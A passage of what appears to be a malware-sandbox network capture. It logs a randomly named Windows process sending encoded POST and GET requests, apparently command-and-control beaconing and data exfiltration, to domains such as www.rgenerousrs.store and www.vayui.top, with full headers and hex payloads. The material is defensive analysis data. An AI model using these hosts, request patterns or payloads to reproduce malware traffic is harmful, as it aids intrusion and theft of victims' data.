59 36 6d 64 37 64 36 69 71 56 38 76 64 4b 74 52 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hu0QVT8YnLXnCr0tLPbOjoPnWw4zXU897FzpHFZjkFlbKCEk74ZVjZtsie/UgutVpKbFKLUJea+yAYHjROxu5AcZqlJfKUSY4qv6+wQzOfZCbJBwCDfDUo1b2usC8mWv1NsttjZ1nYJCIUWEiYhfCqfn7tRSedT19tAgGJ5qUYywLbat1VH6URdTyVDU4huqLqpAZOaHKIUF9QF/hmoCttv/6B5+WCqQ/M1Vbyy0d0Mqo+ilxfDcEoffhF/xd1olORR3mL2EFl9Hk9zDEY6md7d6iqV8vdKtRtW3A66+wRAb2Avu+iafonqgzNKEF7NY7Q5dbfdfiglXuy8GBlVSoPffqe+FTzS8XQ4Towr+No2yI6GuLlWDCfMQ1j9/08lhzk+uIbmQpDBEMezn9BsKmt4mq/MJP12PCGv+qBU66FLKdoFPRoJcZ9mL+yBsFOzhsNZq1G1+j73AGaCXZ8fZkkTJ2+kOGqz1pnqJBo0Fn8LMYaoJTNwoS1MfpsKHwkpvAL/Tn3sx7U/itZ2/CdAqqc1yebR6fZvcW62OF9MAkeTBJ6/Y/K3YqazRSVFo1nJUiU3fzx2r86iHV4lIzNeDebVM/7X5FIJkY2XXS2XogL66K9C0clToZTzCUrMQwVEJZvHNXfyW/YEQhpYUNAFcmcVRX05NVLjslj8JYzbZIfBYb9xBxFaHD1glzco4NxBsZ/i5QxoPflH0GaQNSkPozWsg722FO0BUuElnHcQBpfXpXqdBsFcfSq1f6KO014vk/+CHuYRFQDHUhH7is4+nw7nYz3dExbIqGPMjIcn8xvjrijeq982rLx40HNiXVpAx7SiH4uzwNnRZevkIc+HgaMmtupJb7R/9BKFa7S6qj+eNirLalTzB1Uq62hxJfB+ZVKSVRCv36hLTeDVsnVj8UPtfLpIvRYOb5H//Hi2k4bwYqXuyHUaLHFYNpgmTIltpCna [TRUNCATED]
                                                                  Dec 4, 2024 12:50:59.101582050 CET913INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:50:58 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V36aZKAN2KR4wBamopm6YlmOYJJNGiOg%2FhDWSx8yVpMW7fy9lTW9TQExCaHKs%2BZtmeloqKo%2FDGb8C2HaUGvmxn2wYSPmMcVaTSnFiwdn%2Fs%2B8NJUz4S6uYwBwdNWAl8G"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb94f97c84425d-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10844&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.449897104.21.95.160804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:00.636545897 CET480OUTGET /vg0z/?BTPDLZX=75uk3ictCfC5d95gANF2nAu8q1moq+7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGs6PncMbbDAs+z7vTlvvSa3jEJyrffOxyRk=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.vayui.top
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:51:02.253109932 CET917INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:02 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29QN4nssBjCi6ei6AYTKUd9by5RPCIaRp650AkRc09SPPCdP%2B%2B9RD6n9kFzVAl4UHT2ApV6NLP6Edtp47RiQWwrTAtFVp7pg32xKHRXgeLLgQDnjMvCqyQeFVSX94dg8"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb950afb5d42bd-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1595&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.449916104.21.57.248804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:07.776355982 CET766OUTPOST /o362/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rgenerousrs.store
                                                                  Origin: http://www.rgenerousrs.store
                                                                  Referer: http://www.rgenerousrs.store/o362/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6d 35 56 59 61 54 6e 6d 71 53 37 55 31 75 6f 32 7a 4e 34 52 6b 6f 33 61 56 79 4f 50 58 52 5a 39 6e 67 3d 3d
                                                                  Data Ascii: BTPDLZX=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNm5VYaTnmqS7U1uo2zN4Rko3aVyOPXRZ9ng==
                                                                  Dec 4, 2024 12:51:09.201139927 CET1091INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:09 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sb1ErnMjzzR29hM0XBL129253GiHieYqwYrcSLfMlQbhuEYk9aHS8Rux2WlucpIHKgNqTCSaX3Euhy%2B5PZ0drXjRIg1M%2BiyIh08thSIdBCS7fN7gJ1YZ15tIUD2Sw2xQsyErS6uw2FA%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb95378883f78d-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1655&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.449924104.21.57.248804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:10.439372063 CET786OUTPOST /o362/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rgenerousrs.store
                                                                  Origin: http://www.rgenerousrs.store
                                                                  Referer: http://www.rgenerousrs.store/o362/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 54 70 49 31 48 37 61 53 6b 30 38 74 62 78 33 43 6c 79 44 71 62 69 32 4d 49 51 6e 2f 76 70 36 4e 38 3d
                                                                  Data Ascii: BTPDLZX=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oTpI1H7aSk08tbx3ClyDqbi2MIQn/vp6N8=
                                                                  Dec 4, 2024 12:51:11.872011900 CET1098INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:11 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b98QT9qej0L73OyLkjIj%2BijXP5uy5AyhEKTwjwsFG2RvBgsEleE%2B7pA1YMFD9ubpPJPcXkADTu9pnELn1aBhIVZppwMcrpzt1pXyVqPY3Nmxt33HTdSWmR6fRUgaDxMXsvFMVQDDyNc%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb95483e1142eb-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2034&rtt_var=1017&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.449930104.21.57.248804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:13.112694979 CET10868OUTPOST /o362/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rgenerousrs.store
                                                                  Origin: http://www.rgenerousrs.store
                                                                  Referer: http://www.rgenerousrs.store/o362/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 50 73 70 50 59 61 6c 49 55 52 74 4b 54 4c 4b 33 54 4f 63 54 73 68 35 4f 6e 57 32 77 6c 7a 51 37 54 62 30 38 4a 56 39 38 62 70 35 4e 46 30 6b 34 30 55 77 33 7a 33 67 71 4a 37 57 4b 52 34 36 44 4c 48 4e 69 66 66 6c 54 4a 2b 4d 2b 53 38 59 6a 67 4e 57 36 77 71 59 69 66 70 53 54 79 65 65 4b 63 41 6a 4d 77 43 31 55 47 38 49 75 79 51 6f 2b 74 67 41 49 43 55 62 50 33 64 72 48 41 4b 31 56 41 71 61 2f 4b 48 49 73 75 51 61 48 71 36 31 59 2b 67 32 30 53 49 79 64 7a 64 4e 72 30 35 55 4a [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzPspPYalIURtKTLK3TOcTsh5OnW2wlzQ7Tb08JV98bp5NF0k40Uw3z3gqJ7WKR46DLHNifflTJ+M+S8YjgNW6wqYifpSTyeeKcAjMwC1UG8IuyQo+tgAICUbP3drHAK1VAqa/KHIsuQaHq61Y+g20SIydzdNr05UJmjtWE9ykF/n3XOvLsv0Je4aFE3A7z0PZGrWG91nXz6+X4jxrk3hkcGlUtL9GoDOPAv25iauEfayOuGtirJwhGH6eq9L2CIVDfgKwyOsHW0k6rsMBcSQRvzuFetayvZ1tK4P/cMC9eCaziuKW/fktn++6mdp+swcwKFm0cMVVZQdEUFprbAUJFUS1pIE18OCwLn+swo6BvnmNwiT+ipoXnxHOlM/SVexRK7HzvfYOyJO2w82j+d700RXuI4ctu82tZpsiU4PMlep2cnwYXY0+bAhSYg1Ei56aImPZuZw/bl06DzHiWL42BfxN0tfgqQ7CyFBw/uXLHfGgx9zBkToH4MUe/0a3MEUOlJVUou6bD8fOoRTpEvT3+HKhhMltVVei00E7BNFwUuQ/ySgP2WvInUWB5LXmBWLCHxR8/oh9APcvR+/LSwsGY8OQGm1vV7zsakgE25xvGBD3FZchYR9Tbx4j9f58WIAOf922hQ7b2QENy8mwFdOTc47f/RrQE/hJ458r25nA5CN2msq9eawfsoETdOh7snyZP1Hbysh+dS5JXtL/eNaMgU2+WHXQy5rq9d/e0DtIYldIqtzZ4kCfT4aJJqMjCGDd7PnQCEXH16cM8XbDfz1ztuk0IFbCA+nUJ1OQn1CipS1OmJSdBPyQ3Tkmvl7fkflkTB [TRUNCATED]
                                                                  Dec 4, 2024 12:51:14.513961077 CET1098INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:14 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUhPpNUjioXyUD7OJfPsS5NFvdnMVvDaBEK52pBvXGxf6NzvBp%2Feb%2B4SEWwKiEoJy9l%2BMb53ife7EbIYSOOVl43zEAzsEhnhuLcNQBFwauTDJozz8UOmx5zZYkl0Ok9Omi7dXTWFjq0%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb9558aefe5e64-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2789&min_rtt=2789&rtt_var=1394&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10868&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.449935104.21.57.248804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:15.775770903 CET488OUTGET /o362/?WnQdf=JhLPW&BTPDLZX=FaNItuPk5TcZ9HdSZBH/qM9rY38VGyvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqDzGT3SCCEwZiMzsN5+71dEwGtSagaXjd4i8= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.rgenerousrs.store
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:51:17.195595026 CET1119INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:17 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHce4l%2BPo4yJN2jVNLNVpoyuOZjBNgQXHw8gRGojleO7rzKLhaz9tMObW%2FEZ8njt%2FSaT6Tluoh92DKpjLDUEs6Ut810D9okf7Iqu9j4lKnPD%2BCHdIvFsfvNKbYS3xpa7Rlt5t1YfrKY%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb95695f0243f1-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1675&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>10


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.449953154.88.22.101804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:23.026318073 CET745OUTPOST /jhb8/ HTTP/1.1
